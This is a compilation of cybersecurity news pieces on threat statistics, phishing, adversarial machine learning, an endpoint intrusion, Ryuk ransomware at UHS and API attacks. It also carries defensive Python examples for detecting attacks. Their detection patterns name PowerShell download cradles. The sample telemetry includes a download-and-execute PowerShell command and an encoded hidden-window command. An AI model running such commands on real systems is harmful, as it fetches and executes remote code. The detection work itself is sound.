Organizations plan to use AI and ML to tackle unknown attacks faster

Wipro published a report which provides fresh insights on how AI will be leveraged as part of defender stratagems as more organizations lock horns with sophisticated cyberattacks and become more resilient.


Organizations need to tackle unknown attacks

There has been an increase in R&D with 49% of the worldwide cybersecurity related patents filed in the last four years being focussed on AI and ML application. Nearly half the organizations are expanding cognitive detection capabilities to tackle unknown attacks in their Security Operations Center (SOC).

The report also illustrates a paradigm shift towards cyber resilience amid the rise in global remote work. It considers the impact of the COVID-19 pandemic on the cybersecurity landscape around the globe and provides a path for organizations to adapt to this new normal.

The report saw a global participation of 194 organizations and 21 partner academic, institutional and technology organizations over four months of research.

Global macro trends in cybersecurity

  • Nation state attacks target private sector: 86% of all nation-state attacks fall under espionage category, and 46% of them are targeted towards private companies.
  • Evolving threat patterns have emerged in the consumer and retail sectors: 47% of suspicious social media profiles and domains were detected active in 2019 in these sectors.

Cyber trends sparked by the global pandemic

  • Cyber hygiene proven difficult during remote work enablement: 70% of the organizations faced challenges in maintaining endpoint cyber hygiene and 57% in mitigating VPN and VDI risks.
  • Emerging post-COVID cybersecurity priorities: 87% of the surveyed organizations are keen on implementing zero trust architecture and 87% are planning to scale up secure cloud migration.

Micro trends: An inside-out enterprise view

  • Low confidence in cyber resilience: 59% of the organizations understand their cyber risks but only 23% of them are highly confident about preventing cyberattacks.
  • Strong cybersecurity spend due to board oversight & regulations: 14% of organizations have a security budget of more than 12% of their overall IT budgets.

Micro trends: Best cyber practices to emulate

  • Laying the foundation for a cognitive SOC: 49% of organizations are adding cognitive detection capabilities to their SOC to tackle unknown attacks.
  • Concerns about OT infrastructure attacks increasing: 65% of organizations are performing log monitoring of Operational Technology (OT) and IoT devices as a control to mitigate increased OT risks.

Meso trends: An overview on collaboration

  • Fighting cyber-attacks demands stronger collaboration: 57% of organizations are willing to share only IoCs and 64% consider reputational risks to be a barrier to information sharing.
  • Cyber-attack simulation exercises serve as a strong wakeup call: 60% participate in cyber simulation exercises coordinated by industry regulators, CERTs and third-party service providers, and 79% of organizations have a dedicated cyber insurance policy in place.

Future of cybersecurity

  • 5G security is the emerging area for patent filing: 7% of the worldwide patents filed in the cyber domain in the last four years have been related to 5G security.

Vertical insights by industry

  • Banking, financial services & insurance: 70% of financial services enterprises said that new regulations are fuelling an increase in security budgets, with 54% attributing higher budgets to board intervention.
  • Communications: 71% of organizations consider cloud-hosting risk as a top risk.
  • Consumer: 86% of consumer businesses said email phishing is a top risk and 75% of enterprises said a bad cyber event will lead to damaged brand reputation in the marketplace.
  • Healthcare & life sciences: 83% of healthcare organizations have highlighted maintaining endpoint cyber hygiene as a challenge, and 71% have highlighted that breaches reported by peers have led to increased security budget allocation.
  • Energy, natural resources and utilities: 71% of organizations reported that OT/IT integration would bring new risks.
  • Manufacturing: 58% said that they are not confident about preventing risks from supply chain providers.

Bhanumurthy B.M, President and Chief Operating Officer, Wipro said, “There is a significant shift in global trends like rapid innovation to mitigate evolving threats, strict data privacy regulations and rising concern about breaches.

“Security is ever changing and the report brings more focus, enablement, and accountability on executive management to stay updated. Our research not only focuses on what happened during the pandemic but also provides foresight toward future cyber strategies in a post-COVID world.”

Encryption-based threats grow by 260% in 2020

New Zscaler threat research reveals the emerging techniques and impacted industries behind a 260-percent spike in attacks using encrypted channels to bypass legacy security controls.


Showing that cybercriminals will not be dissuaded by a global health crisis, the research found that they targeted the healthcare industry the most. Following healthcare, the top industries under attack by SSL-based threats were:

1. Healthcare: 1.6 billion (25.5 percent)
2. Finance and Insurance: 1.2 billion (18.3 percent)
3. Manufacturing: 1.1 billion (17.4 percent)
4. Government: 952 million (14.3 percent)
5. Services: 730 million (13.8 percent)

COVID-19 is driving a ransomware surge

Researchers witnessed a 5x increase in ransomware attacks over encrypted traffic beginning in March, when the World Health Organization declared the virus a pandemic. Earlier research from Zscaler indicated a 30,000 percent spike in COVID-related threats, when cybercriminals first began preying on fears of the virus.

Phishing attacks neared 200 million

As one of the most commonly used attacks over SSL, phishing attempts reached more than 193 million instances during the first nine months of 2020. The manufacturing sector was the most targeted (38.6 percent) followed by services (13.8 percent), and healthcare (10.9 percent).

30 percent of SSL-based attacks spoofed trusted cloud providers

Cybercriminals continue to become more sophisticated in avoiding detection, taking advantage of the reputations of trusted cloud providers such as Dropbox, Google, Microsoft, and Amazon to deliver malware over encrypted channels.

Microsoft remains most targeted brand for SSL-based phishing

Since Microsoft technology is among the most adopted in the world, Zscaler identified Microsoft as the most frequently spoofed brand for phishing attacks, which is consistent with the ThreatLabZ 2019 report. Other popular brands for spoofing included PayPal and Google. Cybercriminals are also increasingly spoofing Netflix and other streaming entertainment services during the pandemic.

“Cybercriminals are shamelessly attacking critical industries like healthcare, government and finance during the pandemic, and this research shows how risky encrypted traffic can be if not inspected,” said Deepen Desai, CISO and VP of Security Research at Zscaler. “Attackers have significantly advanced the methods they use to deliver ransomware, for example, inside of an organization utilizing encrypted traffic. The report shows a 500 percent increase in ransomware attacks over SSL, and this is just one example of why SSL inspection is so important to an organization’s defense.”

How to deal with the escalating phishing threat

In today’s world, most external cyberattacks start with phishing. For attackers, it’s almost a no-brainer: phishing is cheap and humans are fallible, even after going through anti-phishing training.


Patrick Harr, CEO at SlashNext, says that while security awareness training is an important aspect of a multi-layered defense strategy, simulating attacks during computer-based training sessions is not an effective way to learn, because people don’t necessarily retain the information.

“Working from home, where there are more distractions, makes it even less likely that people really pay attention to these trainings. That’s why it’s not uncommon to see the same people who tune out training falling for scams again and again,” he noted.

That’s why defenders must preempt attacks, he says, and reinforce a lesson during a live attack. When something gets through and someone clicks on a malicious URL, defenders must be able to simultaneously block the attack and show the victim what the phisher was attempting to do.

Latest phishing trends

Harr, who has over 20 years of experience as a senior executive and GM at industry leading security and storage companies and as a serial entrepreneur and CEO at multiple successful start-ups, is now leading SlashNext, a cybersecurity startup that uses AI to predict and protect enterprise users from phishing threats.

He says that most CISOs assume phishing is a corporate email problem and their current line of defense is adequate, but they are wrong.

“We are detecting 21,000 new phishing attacks a day, many of which have moved beyond corporate email and simple credential stealing. These attacks can easily evade email phishing defenses that rely on static, reputation-based detection. That’s why we typically see 80-90% of attacks evading conventional lines of defense to compromise the network,” he told Help Net Security.

“Magnify this by 150,000 new zero-hour phishing threats a week, almost double the number of threats versus a year ago, and we can safely say, ‘Houston we have a problem!’”

They are seeing:

  • More text-based phishing, with no actual links, across SMS, gaming, search services, ad networks, and collaboration platforms like Zoom, Teams, Box, Dropbox, and Slack, as well as attacks on mobile devices
  • A proliferation of phishing payloads beyond credential stealing scams which have been around for ages
  • An increase in scareware, where phishers attempt to scare people into taking an action, such as sharing an email
  • Rogue software attacks embedded in browser extensions and social engineering schemes like the massive Twitter bitcoin scam that happened in July

“Finally, we’re seeing cybercriminals trying out innovative ways to evade detection. For example, bad actors may register a domain that lays dormant for months before going live,” he added, and noted that they’ve witnessed a 3,000% increase in the number of phishing attacks since everyone began working and learning from home, and they expect this growth trend will continue.

Advice for CISOs

His main advice to CISOs is not to be complacent and to be diligent: near term, mid-term, and long term.

“You’ve got to take a comprehensive, multi-layer phishing defense approach outside the firewall, where your biggest user population is working remotely, and inside the firewall for your internal users. You need to protect mobile devices and PC/Mac endpoints, with end-to-end encryption (E2EE) deployed,” he opined.

“You also have to be mindful of corporate users’ personal side as their personal and business lives have converged, and many people use the same devices and same credentials across personal and business accounts.”

Thirdly, these types of attacks need to be prevented from happening. “Use AI-enabled defenses to fight AI-enabled attacks. Fight machines with machines and adopt a preemptive security posture.”

Finally: some attacks inevitably breach all defenses, so organizations must be prepared to quickly detect and respond to an attack, and to perform the necessary cleanup.

A new threat matrix outlines attacks against machine learning systems

A report published last year has noted that most attacks against artificial intelligence (AI) systems are focused on manipulating them (e.g., influencing recommendation systems to favor specific content), but that new attacks using machine learning (ML) are within attackers’ capabilities.


Microsoft now says that attacks on machine learning (ML) systems are on the uptick and MITRE notes that, in the last three years, “major companies such as Google, Amazon, Microsoft, and Tesla, have had their ML systems tricked, evaded, or misled.” At the same time, most businesses don’t have the right tools in place to secure their ML systems and are looking for guidance.

Experts at Microsoft, MITRE, IBM, NVIDIA, the University of Toronto, the Berryville Institute of Machine Learning and several other companies and educational organizations have therefore decided to create the first version of the Adversarial ML Threat Matrix, to help security analysts detect and respond to this new type of threat.

What is machine learning (ML)?

Machine learning is a subset of artificial intelligence (AI). It is based on computer algorithms that ingest “training” data and “learn” from it, and then deliver predictions, make decisions, or accurately classify things.

Machine learning algorithms are used for tasks like identifying spam, detecting new threats, predicting user preferences, performing medical diagnoses, and so on.

Security should be built in

Mikel Rodriguez, a machine learning researcher at MITRE who also oversees MITRE’s Decision Science research programs, says that we’re now at the same stage with AI as we were with the internet in the late 1980s, when people were just trying to make the internet work and when they weren’t thinking about building in security.

We can learn from that mistake, though, and that’s one of the reasons the Adversarial ML Threat Matrix has been created.

“With this threat matrix, security analysts will be able to work with threat models that are grounded in real-world incidents that emulate adversary behavior with machine learning,” he noted.

Also, the matrix will help them think holistically and spur better communication and collaboration across organizations by giving a common language or taxonomy of the different vulnerabilities, he says.

The Adversarial ML Threat Matrix

“Unlike traditional cybersecurity vulnerabilities that are tied to specific software and hardware systems, adversarial ML vulnerabilities are enabled by inherent limitations underlying ML algorithms. Data can be weaponized in new ways which requires an extension of how we model cyber adversary behavior, to reflect emerging threat vectors and the rapidly evolving adversarial machine learning attack lifecycle,” MITRE noted.

The matrix has been modeled on the MITRE ATT&CK framework.


The group has demonstrated how previous attacks – whether by researchers, red teams or online mobs – can be mapped to the matrix.

They also stressed that it’s going to be routinely updated as feedback from the security and adversarial machine learning community is received. They encourage contributors to point out new techniques, propose best (defense) practices, and share examples of successful attacks on machine learning (ML) systems.

“We are especially excited for new case-studies! We look forward to contributions from both industry and academic researchers,” MITRE concluded.

The anatomy of an endpoint attack

Cyberattacks are becoming increasingly sophisticated as tools and services on the dark web – and even the surface web – enable low-skill threat actors to create highly evasive threats. Unfortunately, most of today’s modern malware evades traditional signature-based anti-malware services, arriving at endpoints with ease. As a result, organizations lacking a layered security approach often find themselves in a precarious situation. Furthermore, threat actors have also become extremely successful at phishing users out of their credentials or simply brute forcing credentials thanks to the widespread reuse of passwords.

A lot has changed across the cybersecurity threat landscape in the last decade, but one thing has remained the same: the endpoint is under siege. What has changed is how attackers compromise endpoints. Threat actors have learned to be more patient after gaining an initial foothold within a system (and essentially scope out their victim).

Take the massive Norsk Hydro ransomware attack as an example: The initial infection occurred three months prior to the attacker executing the ransomware and locking down much of the manufacturer’s computer systems. That was more than enough time for Norsk to detect the breach before the damage could be done, but the reality is most organizations simply don’t have a sophisticated layered security strategy in place.

In fact, the most recent IBM Cost of a Data Breach Report found it took organizations an average of 280 days to identify and contain a breach. That’s more than 9 months that an attacker could be sitting on your network planning their coup de grâce.

So, what exactly are attackers doing with that time? How do they make their way onto the endpoint undetected?

It usually starts with a phish. No matter what report you choose to reference, most point out that around 90% of cyberattacks start with a phish. There are several different outcomes associated with a successful phish, ranging from compromised credentials to a remote access trojan running on the computer. For credential phishes, threat actors have most recently been leveraging customizable subdomains of well-known cloud services to host legitimate-looking authentication forms.

[Screenshot: phishing email and fake authentication form encountered by WatchGuard Threat Lab]

The above screenshot is from a recent phish WatchGuard Threat Lab encountered. The link within the email was customized to the individual recipient, allowing the attacker to populate the victim’s email address into the fake form to increase credibility. The phish was even hosted on a Microsoft-owned domain, albeit on a subdomain (servicemanager00) under the attacker’s control, so you can see how an untrained user might fall for something like this.

In the case of malware phishes, attackers (or at least the successful ones) have largely stopped attaching malware executables to emails. Most people these days recognize that launching an executable email attachment is a bad idea, and most email services and clients have technical protections in place to stop the few that still click. Instead, attackers leverage dropper files, usually in the form of a macro-laced Office document or a JavaScript file.

The document method works best when recipients have not updated their Microsoft Office installations or haven’t been trained to avoid macro-enabled documents. The JavaScript method is a more recently popular method that leverages Windows’ built-in scripting engine to initiate the attack. In either case, the dropper file’s only job is to identify the operating system and then call home and grab a secondary payload.

That secondary payload is usually a remote-access trojan or botnet of some form that includes a suite of tools like keyloggers, shell script-injectors, and the ability to download additional modules. The infection isn’t usually limited to the single endpoint for long after this. Attackers can use their foothold to identify other targets on the victim’s network and rope them in as well.

It’s even easier if the attackers manage to get hold of a valid set of credentials and the organization hasn’t deployed multi-factor authentication. It allows the threat actor to essentially walk right in through the digital front door. They can then use the victim’s own services – like built-in Windows scripting engines and software deployment services – in a living-off-the-land attack to carry out malicious actions. We commonly see threat actors leverage PowerShell to deploy fileless malware in preparation to encrypt and/or exfiltrate critical data.

The WatchGuard Threat Lab recently identified an ongoing infection while onboarding a new customer. By the time we arrived, the threat actor had already been on the victim’s network for some time thanks to compromising at least one local account and one domain account with administrative permissions. Our team was not able to identify how exactly the threat actor obtained the credentials, or how long they had been present on the network, but as soon as our threat hunting services were turned on, indicators immediately lit up identifying the breach.

In this attack, the threat actors used a combination of Visual Basic Scripts and two popular PowerShell toolkits – PowerSploit and Cobalt Strike – to map out the victim’s network and launch malware. One behavior we saw, which came from Cobalt Strike’s shellcode decoder, enabled the threat actors to download malicious commands, load them into memory, and execute them directly from there, without the code ever touching the victim’s hard drive. These fileless malware attacks can range from difficult to impossible to detect with traditional endpoint anti-malware engines that rely on scanning files to identify threats.


Elsewhere on the network our team saw the threat actors using PsExec, a built-in Windows tool, to launch a remote access trojan with SYSTEM-level privileges thanks to the compromised domain admin credentials. The team also identified the threat actors’ attempts to exfiltrate sensitive data to a Dropbox account using a command-line based cloud storage management tool.
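The behaviours described in this attack chain (a macro or JavaScript dropper spawning PowerShell, PowerShell running an in-memory loader, and PsExec launching a payload as SYSTEM) map to a handful of process-creation detections. The following is an added example written for this article, not WatchGuard's own code; the event fields are assumptions loosely modelled on Sysmon/EDR process-creation telemetry, and the sample events are constructed.

```python
"""Detection checks for the endpoint attack chain described above: an Office
document or script-host dropper spawning PowerShell, PowerShell run with
fileless-loader switches, and PsExec launching a payload as SYSTEM.
Added example; the event fields (parent, image, cmdline, user) are
assumptions and the sample events below are constructed, not real IoCs."""
import re
from dataclasses import dataclass
from typing import List, Tuple

@dataclass(frozen=True)
class ProcEvent:
    parent: str   # parent process image name
    image: str    # child process image name
    cmdline: str  # full command line of the child
    user: str     # account the child process runs as

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SHELLS = POWERSHELL | SCRIPT_HOSTS | {"cmd.exe"}

# Switches and cmdlets typical of in-memory (fileless) PowerShell loaders.
# Abbreviated forms only (e.g. -nop, not -NoProfile), so an admin's
# "-NoProfile -File backup.ps1" does not trip the rule on its own.
FILELESS_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"-e(nc|ncodedcommand)?\b",     # -e / -enc / -EncodedCommand
    r"-nop\b",                      # abbreviated -NoProfile
    r"-w(indowstyle)?\s+hidden",    # hidden window
    r"\biex\b|invoke-expression",   # execute a string as code
    r"downloadstring|downloadfile", # download cradle
    r"frombase64string",            # inline decode of a payload
)]

def classify(ev: ProcEvent) -> List[str]:
    """Return the detection names the event matches (empty list if none)."""
    parent, image, user = ev.parent.lower(), ev.image.lower(), ev.user.lower()
    hits: List[str] = []
    # 1. Macro-laced document: Office spawning a shell or script host
    if parent in OFFICE_APPS and image in SHELLS:
        hits.append("office_spawned_script_host")
    # 2. JavaScript dropper: script host pulling a second stage via PowerShell
    if parent in SCRIPT_HOSTS and image in POWERSHELL:
        hits.append("script_host_spawned_powershell")
    # 3. Fileless loader: two or more loader markers on one PowerShell command line
    if image in POWERSHELL:
        markers = sum(1 for p in FILELESS_PATTERNS if p.search(ev.cmdline))
        if markers >= 2:
            hits.append("powershell_fileless_loader")
    # 4. PsExec's service component launching a child as SYSTEM
    if parent == "psexesvc.exe" and user == r"nt authority\system":
        hits.append("psexec_remote_exec_as_system")
    return hits

def scan(events: List[ProcEvent]) -> List[Tuple[str, List[str]]]:
    """Run classify over a batch, keeping only events with at least one hit."""
    results = []
    for ev in events:
        hits = classify(ev)
        if hits:
            results.append((ev.image, hits))
    return results

# Constructed sample telemetry: a .docm dropper, a .js dropper, a
# PsExec-launched payload, and one benign administrative script.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "winword.exe", "WINWORD.EXE invoice.docm", r"corp\alice"),
    ProcEvent("winword.exe", "powershell.exe",
              "powershell.exe -nop -w hidden -enc QUJDREVGR0hJSktMTU5PUA==", r"corp\alice"),
    ProcEvent("explorer.exe", "wscript.exe",
              r"wscript.exe C:\Users\alice\Downloads\report.js", r"corp\alice"),
    ProcEvent("wscript.exe", "powershell.exe",
              "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/s')",
              r"corp\alice"),
    ProcEvent("psexesvc.exe", "svchost_update.exe", "svchost_update.exe -k", r"NT AUTHORITY\SYSTEM"),
    ProcEvent("explorer.exe", "powershell.exe",
              r"powershell.exe -NoProfile -File C:\scripts\backup.ps1", r"corp\bob"),
]

if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(hits)}")
```

Requiring two loader markers rather than one keeps a lone `-enc` or `-w hidden` from paging the SOC; tune the threshold against your own baseline of administrative PowerShell.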

Fortunately, they were able to identify and clean up the malware quickly. However, without the victim changing the stolen credentials, the attacker could have likely re-initiated their attack at will. Had the victim deployed an advanced Endpoint Detection and Response (EDR) engine as part of their layered security strategy, they could have stopped or slowed the damage created from those stolen credentials.

Attackers are targeting businesses indiscriminately, even small organizations. Relying on a single layer of protection simply no longer works to keep a business secure. No matter the size of an organization, it’s important to adopt a layered security approach that can detect and stop modern endpoint attacks. This means protections from the perimeter down to the endpoint, including user training in the middle. And don’t forget about the role of multifactor authentication (MFA) – it could be the difference between stopping an attack and becoming another breach statistic.

Large US hospital chain hobbled by Ryuk ransomware

US-based healthcare giant Universal Health Services (UHS) suffered a cyberattack on Sunday morning, which resulted in the IT network across its facilities being shut down.

[Map: location of UHS facilities]

What happened?

UHS operates nearly 400 hospitals and healthcare facilities throughout the US, Puerto Rico and the UK.

“We implement extensive IT security protocols and are working diligently with our IT security partners to restore IT operations as quickly as possible. In the meantime, our facilities are using their established back-up processes including offline documentation methods,” the company stated on Monday.

“Patient care continues to be delivered safely and effectively. No patient or employee data appears to have been accessed, copied or misused.”

No more details were shared about the nature of the “IT security issue” (as they chose to call it), leaving the door open for unconfirmed reports from professed insiders (employees at some of the affected facilities) to proliferate online.

A Reddit thread started on Monday is chock full of them:

  • The attack involved ransomware – Ryuk ransomware, to be more specific
  • It’s unknown how many systems have been affected, i.e., how widespread is the damage
  • “All UHS hospitals nationwide in the US currently have no access to phones, computer systems, internet, or the data center”
  • Ambulances are being rerouted to other hospitals, information needed to treat patients – health records, lab works, cardiology reports, medications records, etc. – is either temporarily unavailable or received with delay, affecting patient treatment
  • “4 people died tonight alone due to the waiting on results from the lab to see what was going on”

Was it Ryuk?

While most of these reports have yet to be verified, it seems almost certain that ransomware is in play.

Bleeping Computer was told by an employee that the encrypted files sported the .ryk extension and another employee described a ransom note that points to Ryuk ransomware.

“Ryuk can be difficult to detect and contain as the initial infection usually happens via spam/phishing and can propagate and infect IoT/IoMT devices, as we’ve seen with UHS hospital phones and radiology machines. Once on an infected host, it can pull passwords out of memory and then move laterally through open shares, infecting documents and compromised accounts,” commented Jeff Horne, CSO, Ordr.

Justin Heard, Director of Security, Intelligence and Analytics at Nuspire, noted that up until recently, Ryuk was used solely to target financial services, but over the last several months Ryuk has been seen targeting manufacturing, oil and gas, and now healthcare.

“Ryuk is known to target large organizations across industries because it demands a very high ransom. The ransomware operators likely saw UHS as the opportunity to make a quick buck given the urgency to keep operations going, and the monetary loss associated with that downtime could outweigh the ransom demand,” he explained.

“Ryuk Ransomware is run by a group called Wizard Spider, which is known as the Russia-based operator of the TrickBot banking malware. Ryuk is one of the most evasive ransomware out there. Nuspire Intelligence has repeatedly seen the triple threat combo of Ryuk, TrickBot and Emotet to wreak the most damage to a network and harvest the most amount of data.”

Some ransomware operators have previously stated that they would refrain from hitting healthcare organizations. Despite that, the number of attacks targeting medical institutions continues to rise.

Credential stuffing is just the tip of the iceberg

Credential stuffing attacks are taking up a lot of the oxygen in cybersecurity rooms these days. A steady blitz of large-scale cybersecurity breaches in recent years has flooded the dark web with passwords and other credentials that are used in subsequent attacks such as those on Reddit and State Farm, as well as widespread efforts to exploit the remote work and online get-togethers resulting from the COVID-19 pandemic.


But while enterprises are rightly worried about weathering a hurricane of credential-stuffing attacks, they also need to be concerned about more subtle, but equally dangerous, threats to APIs that can slip in under the radar.

Attacks that exploit APIs, beyond credential stuffing, can start small with targeted probing of unique API logic, and lead to exploits such as the theft of personal information, wholesale data exfiltration or full account takeovers.

Unlike automated flood-the-zone, volume-based credential attacks, other API attacks are conducted almost one-to-one and carried out in elusive ways, targeting the distinct vulnerabilities of each API, making them even harder to detect than attacks happening on a large scale. Yet, they’re capable of causing as much, if not more, damage. And they’re becoming more and more prevalent with APIs being the foundation of modern applications.

Beyond credential stuffing

Credential stuffing attacks are a key concern for good reason. High profile breaches—such as those of Equifax and LinkedIn, to name two of many—have resulted in billions of compromised credentials floating around on the dark web, feeding an underground industry of malicious activity. For several years now, about 80% of breaches that have resulted from hacking have involved stolen and/or weak passwords, according to Verizon’s annual Data Breach Investigations Report.

Additionally, research by Akamai determined that three-quarters of credential abuse attacks against the financial services industry in 2019 were aimed at APIs. Many of those attacks are conducted on a large scale to overwhelm organizations with millions of automated login attempts.

The majority of threats to APIs move beyond credential stuffing, which is only one of many threats to APIs as defined in the 2019 OWASP API Security Top 10. In many instances they are not automated, are much more subtle and come from authenticated users.

APIs, which are essential to an increasing number of applications, are specialized entities performing particular functions for specific organizations. Someone exploiting a vulnerability in an API used by a bank, retailer or other institution could, with a couple of subtle calls, dump the database, drain an account, cause an outage or do all kinds of other damage to impact revenue and brand reputation.

An attacker doesn’t even have to necessarily sneak in. For instance, they could sign on to Disney+ as a legitimate user and then poke around the API looking for opportunities to exploit. In one example of a front-door approach, a researcher came across an API vulnerability on the Steam developer site that would allow the theft of game license keys. (Luckily for the company, he reported it—and was rewarded with $20,000.)

Most API attacks are very difficult to detect and defend against since they’re carried out in such a clandestine manner. Because APIs are mostly unique, their vulnerabilities don’t conform to any pattern or signature that would allow common security controls to be enforced at scale. And the damage can be considerable, even coming from a single source. For example, an attacker exploiting a weakness in an API could launch a successful DoS attack with a single request.

API DoS

Rather than the more common DDoS attack, which floods a target with requests from many sources via a botnet, an API DoS can happen when the attacker manipulates the logic of the API, causing the application to overwork itself. If an API is designed to return, say, 10 items per request, an attacker could change that value to 10 million, using up all of an application’s resources and crashing it—with a single request.
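The pagination case above is easy to reproduce and to fix. The following added example (not from the article) shows a list endpoint that honours any `limit` the client sends next to one that validates and clamps it, and records the clamped request for the SOC; the handler shapes, `MAX_PAGE_SIZE`, `MAX_OFFSET` and the in-memory record store are assumptions.

```python
"""Vulnerable versus hardened handling of a client-supplied page size, the
API DoS case described above (limit=10 turned into limit=10000000).
Added example, not from the article; the handler shapes, the ceilings and
the in-memory record store are assumptions."""
from typing import Dict, List, Optional, Tuple

DEFAULT_PAGE_SIZE = 10
MAX_PAGE_SIZE = 100       # assumed server-side ceiling
MAX_OFFSET = 1_000_000    # assumed ceiling; unbounded offsets are a cost lever too

# Constructed backing store standing in for a database table.
RECORDS = [{"id": i, "name": f"item-{i}"} for i in range(5000)]

class BadRequest(Exception):
    """Maps to an HTTP 400 in a real framework."""

def list_items_vulnerable(params: Dict[str, str]) -> List[dict]:
    """Honours whatever 'limit' the client sends. limit=10000000 makes the
    server materialise and serialise everything it has; against a real
    database it becomes an unbounded query, i.e. the single-request outage
    the article describes."""
    limit = int(params.get("limit", DEFAULT_PAGE_SIZE))
    offset = int(params.get("offset", 0))
    return RECORDS[offset:offset + limit]

def parse_bounded_int(raw: Optional[str], name: str, default: int,
                      minimum: int, ceiling: int) -> Tuple[int, bool]:
    """Validate an integer query parameter and clamp it to [minimum, ceiling].
    Returns (effective_value, was_clamped). Non-numeric or too-small values
    are rejected outright so that probing shows up as 4xx responses."""
    if raw is None:
        return default, False
    try:
        value = int(raw)
    except ValueError:
        raise BadRequest(f"{name} must be an integer")
    if value < minimum:
        raise BadRequest(f"{name} must be >= {minimum}")
    if value > ceiling:
        return ceiling, True
    return value, False

def list_items_hardened(params: Dict[str, str], audit: List[str]) -> List[dict]:
    """Same endpoint with bounded pagination. `audit` stands in for the SIEM
    sink: a clamped request is still served, but recorded, because asking
    for 10 million rows is a probe worth alerting on."""
    limit, clamped_limit = parse_bounded_int(params.get("limit"), "limit",
                                             DEFAULT_PAGE_SIZE, 1, MAX_PAGE_SIZE)
    offset, clamped_offset = parse_bounded_int(params.get("offset"), "offset",
                                               0, 0, MAX_OFFSET)
    if clamped_limit or clamped_offset:
        audit.append(f"pagination abuse: requested limit={params.get('limit')} "
                     f"offset={params.get('offset')}, served limit={limit} offset={offset}")
    return RECORDS[offset:offset + limit]

def rejects(params: Dict[str, str]) -> bool:
    """True if the hardened handler refuses the request with BadRequest."""
    try:
        list_items_hardened(params, [])
    except BadRequest:
        return True
    return False

if __name__ == "__main__":
    log: List[str] = []
    print("vulnerable:", len(list_items_vulnerable({"limit": "10000000"})), "rows")
    print("hardened:  ", len(list_items_hardened({"limit": "10000000"}, log)), "rows")
    print("\n".join(log))
```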

Credential stuffing attacks present security challenges of their own. With easy access to evasion tools—and with their own sophistication improving dramatically – it’s not difficult for attackers to disguise their activity behind a mesh of thousands of IP addresses and devices. But credential stuffing nevertheless is an established problem with established solutions.

How enterprises can improve

Enterprises can scale infrastructure to mitigate credential stuffing attacks or buy a solution capable of identifying and stopping the attacks. The trick is to evaluate large volumes of activity and block malicious login attempts without impacting legitimate users, and to do it quickly, identifying successful malicious logins and alerting users in time to protect them from fraud.
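The detection goal stated above (separate a stuffing flood from legitimate users, then find the logins that succeeded during it so those users can be warned) is illustrated by the following added example, which is not from the article; the log format, the thresholds and the log lines are all constructed assumptions.

```python
"""Flag credential-stuffing sources in authentication logs and list the
accounts that logged in successfully from them during the burst, i.e. the
users who need to be alerted. Added example; the log format, thresholds
and sample records are constructed assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timezone
from typing import Dict, List, Set, Tuple

WINDOW_SECONDS = 300          # assumed sliding window
MIN_DISTINCT_ACCOUNTS = 5     # assumed; real deployments use far higher values
MAX_SUCCESS_RATE = 0.2        # stuffing succeeds rarely; legit users mostly succeed

LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) "
                     r"result=(?P<result>SUCCESS|FAILURE)$")

def parse(lines: List[str]) -> List[Tuple[float, str, str, bool]]:
    """Parse log lines into (epoch, source, user, success), oldest first.
    Malformed lines are skipped rather than aborting the whole batch."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        ts = ts.replace(tzinfo=timezone.utc).timestamp()
        events.append((ts, m["src"], m["user"], m["result"] == "SUCCESS"))
    return sorted(events)

def detect(lines: List[str], window: int = WINDOW_SECONDS,
           min_accounts: int = MIN_DISTINCT_ACCOUNTS,
           max_success_rate: float = MAX_SUCCESS_RATE) -> Dict[str, Set[str]]:
    """Return {source: accounts that logged in successfully during a burst}.
    A source is flagged when, within any `window`-second span, it tried at
    least `min_accounts` distinct usernames and at most `max_success_rate`
    of those attempts succeeded. A single user mistyping a password a few
    times never reaches the distinct-account threshold."""
    by_src: Dict[str, List[Tuple[float, str, bool]]] = defaultdict(list)
    for ts, src, user, ok in parse(lines):
        by_src[src].append((ts, user, ok))
    flagged: Dict[str, Set[str]] = {}
    for src, evs in by_src.items():
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:   # slide the window
                start += 1
            span = evs[start:end + 1]
            users = {u for _, u, _ in span}
            successes = [u for _, u, ok in span if ok]
            if len(users) >= min_accounts and len(successes) / len(span) <= max_success_rate:
                flagged.setdefault(src, set()).update(successes)
    return flagged

# Constructed sample: one source cycling through eight accounts with a single
# hit, and one legitimate user who mistypes twice before getting in.
SAMPLE_LOG = """\
2020-10-05T09:00:00Z src=198.51.100.9 user=u01 result=FAILURE
2020-10-05T09:00:03Z src=198.51.100.9 user=u02 result=FAILURE
2020-10-05T09:00:05Z src=192.0.2.10 user=alice result=FAILURE
2020-10-05T09:00:06Z src=198.51.100.9 user=u03 result=FAILURE
2020-10-05T09:00:09Z src=198.51.100.9 user=u04 result=FAILURE
2020-10-05T09:00:12Z src=198.51.100.9 user=u05 result=FAILURE
2020-10-05T09:00:15Z src=198.51.100.9 user=u06 result=SUCCESS
2020-10-05T09:00:18Z src=198.51.100.9 user=u07 result=FAILURE
2020-10-05T09:00:20Z src=192.0.2.10 user=alice result=FAILURE
2020-10-05T09:00:21Z src=198.51.100.9 user=u08 result=FAILURE
2020-10-05T09:00:35Z src=192.0.2.10 user=alice result=SUCCESS
this line is malformed and should be ignored
""".splitlines()

if __name__ == "__main__":
    for src, accounts in detect(SAMPLE_LOG).items():
        print(f"block {src}; force password reset and alert: {sorted(accounts)}")
```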

Enterprises can improve API security first and foremost by identifying all of their APIs, including the data they expose, how they are used, and even those the organization didn’t know existed. When APIs fly under security operators’ radar, otherwise secure infrastructure has a hole in the fence. Once full visibility is attained, enterprises can more tightly control API access and use, and thus enable better security.

Nine out of ten IT pros have experienced a data breach

Exonar has today published research revealing that 94 percent of IT pros have experienced a data breach, and an overwhelming majority (79 percent) are worried that their current organization could be next.


